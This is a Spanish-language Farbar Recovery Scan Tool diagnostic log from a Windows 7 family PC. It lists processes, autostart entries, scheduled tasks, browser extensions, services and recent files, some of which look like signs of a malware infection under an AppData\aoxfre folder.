    Internet Explorer Versión 11 (Navegador predeterminado: Chrome)
    Modo de Inicio: Normal
    Tutorial para Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

    ==================== Procesos (Lista blanca) =================

    (Si una entrada es incluida en el fixlist, el proceso será cerrado. El archivo no será movido.)

    () [Archivo no firmado] C:\Users\Familia Landaeta\Desktop\Riot Games\Riot Client\RiotClientCrashHandler.exe
    (Adobe Inc. -> Adobe Systems) C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
    (Google LLC -> Google LLC) C:\Program Files\Google\Chrome\Application\chrome.exe <7>
    (Intel Corporation -> Intel Corporation) C:\Windows\System32\hkcmd.exe
    (Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxpers.exe
    (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
    (Microsoft Windows -> Microsoft Corporation) C:\Users\Familia Landaeta\AppData\Local\aoxfre\exoebvbdf.exe
    (Microsoft Windows -> Microsoft Corporation) C:\Users\Familia Landaeta\AppData\Local\aoxfre\xbcelueun.exe <2>
    (Open Source Developer, Phillip Gibbons -> Highresolution Enterprises) C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\XMouseButtonControl.exe
    (Oracle America, Inc. -> Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe
    (Piriform Software Ltd -> Piriform Software Ltd) C:\Program Files\CCleaner\CCleaner.exe
    (Riot Games, Inc. -> ) C:\Users\Familia Landaeta\Desktop\Riot Games\League of Legends\LeagueCrashHandler.exe
    (Riot Games, Inc. -> Riot Games, Inc.) C:\Users\Familia Landaeta\Desktop\Riot Games\League of Legends\LeagueClient.exe
    (Riot Games, Inc. -> Riot Games, Inc.) C:\Users\Familia Landaeta\Desktop\Riot Games\League of Legends\LeagueClientUx.exe
    (Riot Games, Inc. -> Riot Games, Inc.) C:\Users\Familia Landaeta\Desktop\Riot Games\League of Legends\LeagueClientUxRender.exe <2>
    (Riot Games, Inc. -> Riot Games, Inc.) C:\Users\Familia Landaeta\Desktop\Riot Games\Riot Client\RiotClientServices.exe
    (SEIKO EPSON Corporation -> SEIKO EPSON CORPORATION) C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_JT50RP.EXE
    (SEIKO EPSON Corporation -> Seiko Epson Corporation) C:\Windows\System32\escsvc.exe

    ==================== Registro (Lista blanca) ===================

    (Si una entrada es incluida en el fixlist, el elemento del registro será restaurado a su valor predeterminado o será eliminado. El archivo no será movido.)

    HKLM\...\Run: [GrooveMonitor] => C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
    HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [601424 2018-07-07] (Oracle America, Inc. -> Oracle Corporation)
    HKLM\...\Run: [XMouseButtonControl] => C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\XMouseButtonControl.exe [1346848 2020-02-09] (Open Source Developer, Phillip Gibbons -> Highresolution Enterprises)
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restricción <==== ATENCIÓN
    HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [wmwrdqj] => C:\Users\Familia Landaeta\AppData\Local\aoxfre\xbcelueun.exe [141824 2013-10-11] (Microsoft Windows -> Microsoft Corporation)
    HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [Steam] => C:\Program Files\Steam\steam.exe [3371296 2020-04-03] (Valve -> Valve Corporation)
    HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner.exe [18227896 2020-03-19] (Piriform Software Ltd -> Piriform Software Ltd)
    HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Policies\Explorer: [TaskbarNoNotification] 0
    HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Policies\Explorer: [HideSCAHealth] 0
    HKU\S-1-5-21-1692793609-910991690-2205039242-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Mystify.scr [221184 2010-11-20] (Microsoft Windows -> Microsoft Corporation)
    HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\81.0.4044.129\Installer\chrmstp.exe [2020-04-27] (Google LLC -> Google LLC)
    HKLM\Software\Microsoft\Active Setup\Installed Components: [{A6EADE66-0000-0000-484E-7E8A45000000}] -> C:\Program Files\Adobe\Acrobat Reader DC\Esl\AiodLite.dll [2019-02-18] (Adobe Systems, Incorporated -> Adobe Systems, Inc.)
    Startup: C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Recorte de pantalla e Inicio rápido de OneNote 2007.lnk [2016-10-06]
    ShortcutTarget: Recorte de pantalla e Inicio rápido de OneNote 2007.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation)
    Startup: C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.lnk [2020-04-25]
    ShortcutAndArgument: user.lnk -> C:\Windows\System32\cmd.exe => 
    Startup: C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xiwlwq.lnk [2020-04-28]
    ShortcutTarget: xiwlwq.lnk -> C:\Users\Familia Landaeta\AppData\Local\aoxfre\xbcelueun.exe (Microsoft Windows -> Microsoft Corporation)
    BootExecute: autocheck autochk /p \??\F:autocheck autochk * 
    FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restricción <==== ATENCIÓN
    CHR HKLM\SOFTWARE\Policies\Google: Restricción <==== ATENCIÓN

    ==================== Tareas programadas (Lista blanca) ============

    (Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

    Task: {1F3AC100-06D5-4A79-ACEB-822B7917AF2F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [154440 2016-09-12] (Google Inc -> Google Inc.)
    Task: {268EE322-C696-4C2A-ADED-73EEE65E5919} - System32\Tasks\{33D029CD-E2EB-4BBF-840D-05EE30782182} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Documents\Need for Speed Carbon\eauninstall.exe" -d "C:\Users\Familia Landaeta\Documents\Need for Speed Carbon"
    Task: {4F752C9C-8039-4148-94E7-17E0424FB331} - System32\Tasks\{B578D2A0-8F24-4C93-B6F3-0E29139E5C47} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Documents\Warcraft III\SetupReg.exe" -d "C:\Users\Familia Landaeta\Documents\Warcraft III"
    Task: {567F1F3E-ABD2-499D-A6D1-BC4DDAD5D52D} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1242704 2020-02-25] (Adobe Inc. -> Adobe Systems)
    Task: {570D5DE2-C919-42FC-A539-77A73D8973DD} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [18227896 2020-03-19] (Piriform Software Ltd -> Piriform Software Ltd)
    Task: {65B18C1F-B953-43BD-B364-B3652C2ACD60} - System32\Tasks\{D3E37D6B-A5F9-4EBD-83FD-1DE5065FB775} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Documents\Need for Speed Carbon\setup.exe" -d "C:\Users\Familia Landaeta\Documents\Need for Speed Carbon"
    Task: {672FBA20-83CF-4151-8163-DE75916F4816} - System32\Tasks\{0C16381D-B4C5-4BFB-B0DE-23B539A738D3} => C:\Users\Familia Landaeta\Documents\counter strike\gta_sa.exe [14386176 2005-07-07] () [Archivo no firmado]
    Task: {6A8118B4-971B-4F03-8286-DCFE031C205F} - System32\Tasks\Avast Emergency Update => C:\Program Files\Avast Software\Avast\AvEmUpdate.exe
    Task: {98EF0C7A-E07F-4010-81AC-98CE50D1478C} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [686384 2020-03-19] (Piriform Software Ltd -> Piriform Software Ltd)
    Task: {A6C8DED6-B773-4517-BF76-B6538CD4434C} - System32\Tasks\{FE65F450-8DDE-41FF-8B71-F2B53B14CB22} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Desktop\Hitman 1\directx7\dxsetup.exe" -d "C:\Users\Familia Landaeta\Desktop\Hitman 1\directx7"
    Task: {AD5C2F40-438A-4391-8C94-3D407E01EF45} - System32\Tasks\{8E6B5861-4FEB-40B7-AA9A-A940302A2D7E} => C:\Users\Familia Landaeta\Documents\counter strike\gta_sa.exe [14386176 2005-07-07] () [Archivo no firmado]
    Task: {CCB34560-3404-4CE5-9DAB-6B46BCB23E2D} - System32\Tasks\{B9641373-3BD3-45E5-A647-78413E924EF2} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Documents\HDGHDFG\Eidos Interactive\Pyro\Commandos\MPLAYER\mplaynow.exe" -d "C:\Users\Familia Landaeta\Documents\HDGHDFG\Eidos Interactive\Pyro\Commandos\MPLAYER"
    Task: {CCF2697C-254A-4318-8141-8CD0B637D74A} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe
    Task: {D6A3E4BB-CBD0-4187-9DCC-3D6F403A10BE} - System32\Tasks\{57FB3682-2104-4F36-8579-4DC3DC47852F} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Documents\DownloaderPWCZ\PWCZ_ClienteCompleto_v139\install.exe" -d "C:\Users\Familia Landaeta\Documents\DownloaderPWCZ\PWCZ_ClienteCompleto_v139"
    Task: {DAD5D05F-49AA-4561-BCB6-CF36DEC9F03F} - System32\Tasks\{BDC282FB-7E2B-40AD-B6A1-10CE822F66CB} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Desktop\Counter-Strike 1.6\unins000.exe" -d "C:\Users\Familia Landaeta\Desktop\Counter-Strike 1.6"
    Task: {DC289D95-95B2-4999-9194-C785C844D430} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [154440 2016-09-12] (Google Inc -> Google Inc.)
    Task: {E292CC29-6E23-428B-A8A9-8B353DCB0242} - System32\Tasks\{27B6EE2D-9F7D-4816-8664-F8C35923C977} => C:\Users\Familia Landaeta\Documents\counter strike\gta_sa.exe [14386176 2005-07-07] () [Archivo no firmado]
    Task: {EB26897C-3B5C-4277-B0BC-C6842F8F6430} - System32\Tasks\{B695C6D3-B08B-4889-8983-0E883F2B1BD2} => C:\Users\Familia Landaeta\Documents\counter strike\gta_sa.exe [14386176 2005-07-07] () [Archivo no firmado]
    Task: {EF2ECF57-BD80-471F-B663-4A9C03A36584} - System32\Tasks\{8C3C6385-93E2-4818-A124-0E0FECD10D73} => C:\Users\Familia Landaeta\Documents\counter strike\gta_sa.exe [14386176 2005-07-07] () [Archivo no firmado]
    Task: {FB402BC5-78F6-4A55-937B-E6AEEE83C91C} - System32\Tasks\{71A43D0C-6750-4381-ACFE-5879AE010440} => C:\Users\Familia Landaeta\Documents\counter strike\gta_sa.exe [14386176 2005-07-07] () [Archivo no firmado]

    (Si una entrada es incluida en el fixlist, el archivo de tarea (.job) será movido. El archivo que está siendo ejecutado por la tarea no será movido.)


    ==================== Internet (Lista blanca) ====================

    (Si un elemento es incluido en el fixlist, y éste pertenece al registro, será eliminado o restaurado a su valor predeterminado.)

    Winsock: Catalog5 08 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL => Ningún archivo 
    Winsock: Catalog5 09 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL => Ningún archivo 
    Hosts: Hay más de una entrada en Hosts. Consulte la sección Hosts de Addition.txt
    Tcpip\Parameters: [DhcpNameServer] 37.120.145.234 8.8.8.8
    Tcpip\..\Interfaces\{6657F0B0-4452-44DD-8333-C6955B9AC142}: [DhcpNameServer] 192.168.42.129
    Tcpip\..\Interfaces\{6CBAB555-2BC9-4266-B7B7-0CBF840B2538}: [DhcpNameServer] 37.120.145.234 8.8.8.8
    Tcpip\..\Interfaces\{7C7F7E39-7E43-45F1-9777-5354FEA74937}: [DhcpNameServer] 192.168.42.129

    Internet Explorer:
    ==================
    SearchScopes: HKU\S-1-5-21-1692793609-910991690-2205039242-1000 -> {2F3822DF-85FD-483C-B3AA-38ECD8118D39} URL = hxxps://ve.search.yahoo.com/search?p={searchTerms}&intl=ve&fr=yset_ie_syc_oracle&type=orcl_default&partnerexternal-oracle=external-oracle
    BHO: E-Web Print -> {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} -> C:\Program Files\Epson Software\E-Web Print\ewps_tb.dll [2014-11-27] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
    BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
    BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_181\bin\ssv.dll [2018-07-26] (Oracle America, Inc. -> Oracle Corporation)
    BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_181\bin\jp2ssv.dll [2018-07-26] (Oracle America, Inc. -> Oracle Corporation)
    Toolbar: HKLM - E-Web Print - {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} - C:\Program Files\Epson Software\E-Web Print\ewps_tb.dll [2014-11-27] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
    Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll [2006-10-27] (Microsoft Corporation -> Microsoft Corporation)

    FireFox:
    ========
    FF DefaultProfile: dqwbx6g2.default
    FF ProfilePath: C:\Users\Familia Landaeta\AppData\Roaming\Mozilla\Firefox\Profiles\dqwbx6g2.default [2020-04-27]
    FF Homepage: Mozilla\Firefox\Profiles\dqwbx6g2.default -> hxxp://www.google.com/
    FF Extension: (Search and New Tab by Yahoo) - C:\Users\Familia Landaeta\AppData\Roaming\Mozilla\Firefox\Profiles\dqwbx6g2.default\Extensions\[email protected] [2017-04-10] [Heredado]
    FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Epson Software\E-Web Print\Firefox Add-on
    FF Extension: (E-Web Print) - C:\Program Files\Epson Software\E-Web Print\Firefox Add-on [2016-10-09] [Heredado] [no firmado]
    FF Plugin: @java.com/DTPlugin,version=11.181.2 -> C:\Program Files\Java\jre1.8.0_181\bin\dtplugin\npDeployJava1.dll [2018-07-26] (Oracle America, Inc. -> Oracle Corporation)
    FF Plugin: @java.com/JavaPlugin,version=11.181.2 -> C:\Program Files\Java\jre1.8.0_181\bin\plugin2\npjp2.dll [2018-07-26] (Oracle America, Inc. -> Oracle Corporation)
    FF Plugin: @videolan.org/vlc,version=2.2.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN -> VideoLAN)
    FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2019-02-18] (Adobe Systems, Incorporated -> Adobe Systems Inc.)

    Chrome: 
    =======
    CHR DefaultProfile: Default
    CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default [2020-04-28]
    CHR NewTab: Default ->  Not-active:"chrome-extension://dobeegjfclcaalnakkicjhgcbmjcghbp/newtab/newtab.html"
    CHR Extension: (Presentaciones) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-02-08]
    CHR Extension: (Documentos) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2018-02-08]
    CHR Extension: (Google Drive) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-09-12]
    CHR Extension: (YouTube) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-09-12]
    CHR Extension: (TV Hero) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\dobeegjfclcaalnakkicjhgcbmjcghbp [2020-04-16]
    CHR Extension: (Adobe Acrobat) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2020-04-16]
    CHR Extension: (Hojas de cálculo) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-02-08]
    CHR Extension: (Documentos de Google sin conexión) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-04-20]
    CHR Extension: (AdBlock: el mejor bloqueador de anuncios) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2020-04-21]
    CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-04-16]
    CHR Extension: (Gmail) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-05-07]
    CHR Extension: (Chrome Media Router) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-04-21]
    CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Guest Profile [2020-04-25]
    CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1 [2020-04-25]
    CHR Extension: (Presentaciones de Google) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-12-08]
    CHR Extension: (Google Docs) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2016-12-08]
    CHR Extension: (Google Drive) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-12-08]
    CHR Extension: (YouTube) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-12-08]
    CHR Extension: (Hojas de cálculo de Google) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-12-08]
    CHR Extension: (Documentos de Google sin conexión) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-12-08]
    CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-12-08]
    CHR Extension: (Gmail) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-12-08]
    CHR Extension: (Chrome Media Router) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-12-08]
    CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 2 [2018-07-11]
    CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 3 [2020-04-25]
    CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 5 [2018-07-11]
    CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 6 [2018-07-11]
    CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 7 [2018-07-11]
    CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\System Profile [2020-04-25]
    CHR HKLM\...\Chrome\Extension: [ibbfklbaljofpaanmpaeadejijfdddco]
    CHR HKU\S-1-5-21-1692793609-910991690-2205039242-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj]

    ==================== Servicios (Lista blanca) ===================

    (Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

    R2 AdobeARMservice; C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe [88648 2020-02-25] (Adobe Inc. -> Adobe Systems)
    R2 EpsonScanSvc; C:\Windows\system32\EscSvc.exe [122000 2011-12-12] (SEIKO EPSON Corporation -> Seiko Epson Corporation)
    R2 EPSON_PM_RPCV4_05; C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_JT50RP.EXE [142432 2012-02-27] (SEIKO EPSON Corporation -> SEIKO EPSON CORPORATION)
    S3 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [5547464 2020-04-27] (Malwarebytes Inc -> Malwarebytes)
    S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2013-05-27] (Microsoft Windows -> Microsoft Corporation)

    ===================== Controladores (Lista blanca) ===================

    (Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

    S3 hamachi; C:\Windows\System32\DRIVERS\hamachi.sys [27040 2017-03-02] (LogMeIn, Inc. -> LogMeIn, Inc.)
    S3 RimUsb; C:\Windows\System32\Drivers\RimUsb.sys [22656 2007-05-14] (Microsoft Windows Hardware Compatibility Publisher -> Research In Motion Limited)
    R3 RTL8167; C:\Windows\System32\DRIVERS\Rt86win7.sys [139776 2009-07-13] (Microsoft Windows -> Realtek Corporation )
    S3 wdm_usb; C:\Windows\System32\DRIVERS\usb2ser.sys [128704 2016-08-16] (NGO -> MBB)

    ==================== NetSvcs (Lista blanca) ===================

    (Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)


    ==================== Un mes (creado) ===================

    (Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.)

    2020-04-28 12:32 - 2020-04-28 12:34 - 000021183 _____ C:\Users\Familia Landaeta\Desktop\FRST.txt
    2020-04-28 10:08 - 2020-04-28 10:08 - 000000000 ____D C:\Users\Familia Landaeta\Desktop\FRST-OlderVersion
    2020-04-27 12:17 - 2020-04-27 12:17 - 000000000 ____D C:\Users\Familia Landaeta\Documents\League of Legends
    2020-04-27 12:00 - 2020-04-27 12:01 - 000000000 ____D C:\AdwCleaner
    2020-04-27 11:56 - 2020-04-28 12:32 - 000000000 ____D C:\Users\Familia Landaeta\Desktop\reparacion
    2020-04-27 11:03 - 2020-04-27 11:03 - 000222648 _____ (Malwarebytes) C:\Windows\system32\Drivers\7372779E.sys
    2020-04-27 10:57 - 2020-04-27 11:44 - 000000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
    2020-04-27 10:57 - 2020-04-27 11:30 - 000000000 ____D C:\Users\Familia Landaeta\Desktop\mbar
    2020-04-27 10:57 - 2020-04-27 10:57 - 000166848 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
    2020-04-26 20:38 - 2020-04-27 11:03 - 000000000 ____D C:\ProgramData\Malwarebytes
    2020-04-26 19:03 - 2020-04-27 11:56 - 000085323 _____ C:\Users\Familia Landaeta\Desktop\mb-clean-results.txt
    2020-04-25 21:01 - 2020-04-25 21:02 - 001980016 _____ (Malwarebytes) C:\Users\Familia Landaeta\Downloads\MBSetup (1).exe
    2020-04-25 20:58 - 2020-04-27 12:41 - 000129056 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae.sys
    2020-04-25 20:26 - 2020-04-25 20:32 - 000000000 ____D C:\ProgramData\MB2Migration
    2020-04-25 20:26 - 2020-04-25 20:26 - 000000000 ____D C:\Windows\system32\Drivers\etc\BACKUP
    2020-04-25 20:25 - 2020-04-25 20:25 - 000000000 ____D C:\Users\Familia Landaeta\Downloads\Malwarebytes Premium 3.8.3[programasuniversalespc.blogspot.com]
    2020-04-25 20:19 - 2020-04-25 20:20 - 065888313 _____ C:\Users\Familia Landaeta\Downloads\Malwarebytes Premium 3.8.3[programasuniversalespc.blogspot.com].zip
    2020-04-25 19:26 - 2020-04-25 19:26 - 000000000 ____D C:\Windows\system32\Tasks\Avast Software
    2020-04-25 19:25 - 2020-04-25 19:54 - 000004168 _____ C:\Windows\system32\Tasks\Avast Emergency Update
    2020-04-25 19:02 - 2020-04-26 20:09 - 000000000 ____D C:\ProgramData\Avast Software
    2020-04-25 18:59 - 2020-04-25 20:03 - 000000000 ____D C:\Program Files\CCleaner
    2020-04-25 18:59 - 2020-04-25 18:59 - 000003870 _____ C:\Windows\system32\Tasks\CCleaner Update
    2020-04-25 18:59 - 2020-04-25 18:59 - 000002844 _____ C:\Windows\system32\Tasks\CCleanerSkipUAC
    2020-04-25 18:59 - 2020-04-25 18:59 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
    2020-04-25 12:24 - 2020-04-28 09:51 - 000065536 _____ C:\Windows\system32\Ikeext.etl
    2020-04-25 11:16 - 2020-04-25 11:16 - 000000207 _____ C:\Windows\tweaking.com-regbackup-FAMILIALANDAETA-Windows-7-Ultimate-(32-bit).dat
    2020-04-25 11:16 - 2020-04-25 11:16 - 000000000 ____D C:\RegBackup
    2020-04-25 11:14 - 2020-04-25 11:14 - 000000000 ____D C:\Program Files\Tweaking.com
    2020-04-25 01:36 - 2020-04-25 01:36 - 000000275 _____ C:\DelFix.txt
    2020-04-25 01:36 - 2020-04-25 01:36 - 000000000 ____D C:\Windows\ERUNT
    2020-04-22 12:58 - 2020-04-22 12:58 - 000000000 ____D C:\Program Files\Malwarebytes
    2020-04-22 10:38 - 2020-04-22 10:39 - 000000000 ____D C:\Users\Familia Landaeta\AppData\Local\Steam
    2020-04-22 09:52 - 2020-04-28 10:06 - 000000000 ____D C:\Program Files\Steam
    2020-04-22 09:52 - 2020-04-26 01:03 - 000000000 ____D C:\Program Files\Common Files\Steam
    2020-04-22 09:52 - 2020-04-22 09:52 - 000000921 _____ C:\Users\Public\Desktop\Steam.lnk
    2020-04-22 09:52 - 2020-04-22 09:52 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
    2020-04-22 03:14 - 2020-04-22 03:15 - 001573568 _____ C:\Users\Familia Landaeta\Downloads\steam-2020-01-17.exe
    2020-04-21 10:16 - 2020-04-21 10:16 - 000002383 _____ C:\Users\Familia Landaeta\Desktop\Intel(R) Processor Identification Utility.lnk
    2020-04-21 10:16 - 2020-04-21 10:16 - 000000000 ____D C:\Users\Familia Landaeta\AppData\Local\Caphyon
    2020-04-21 10:15 - 2020-04-21 10:15 - 000000000 ____D C:\ProgramData\Package Cache
    2020-04-21 09:52 - 2020-04-21 09:52 - 000000000 ____D C:\Program Files\Intel Corporation
    2020-04-21 09:47 - 2020-04-21 09:52 - 021381072 _____ (Intel Corporation) C:\Users\Familia Landaeta\Downloads\Intel(R) Processor Identification Utility.exe
    2020-04-21 08:51 - 2020-04-21 08:51 - 000001160 _____ C:\Users\Familia Landaeta\Desktop\Play UGGunz!.lnk
    2020-04-21 00:25 - 2020-04-21 02:51 - 581405066 _____ C:\Users\Familia Landaeta\Downloads\gunzv10.exe
    2020-04-20 18:29 - 2020-04-21 02:09 - 000000000 ____D C:\Users\Public\BlueStacks
    2020-04-20 18:28 - 2020-04-21 20:25 - 000000000 ____D C:\Users\Familia Landaeta\AppData\Local\Bluestacks
    2020-04-20 18:28 - 2020-04-20 18:28 - 000998072 _____ (BlueStack Systems Inc.) C:\Users\Familia Landaeta\Downloads\BlueStacksInstaller_4.190.0.5002_native_53674e065a3fa5d20ea925fe2672c89c.exe
    2020-04-20 13:03 - 2020-04-20 13:04 - 000038958 _____ C:\Users\Familia Landaeta\Downloads\Addition.txt
    2020-04-20 13:02 - 2020-04-20 13:04 - 000026632 _____ C:\Users\Familia Landaeta\Downloads\FRST.txt
    2020-04-20 13:01 - 2020-04-28 12:33 - 000000000 ____D C:\FRST
    2020-04-20 12:20 - 2020-04-28 10:08 - 002011136 _____ (Farbar) C:\Users\Familia Landaeta\Desktop\FRST.exe
    2020-04-19 18:31 - 2020-04-19 18:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Highresolution Enterprises
    2020-04-19 18:31 - 2020-04-19 18:31 - 000000000 ____D C:\Program Files\Highresolution Enterprises
    2020-04-19 18:28 - 2020-04-19 18:31 - 002713952 _____ C:\Users\Familia Landaeta\Downloads\x-mouse-button-control-2-19.exe
    2020-04-17 11:34 - 2020-04-17 16:45 - 022267336 _____ (Piriform Software Ltd) C:\Users\Familia Landaeta\Downloads\ccsetup565.exe
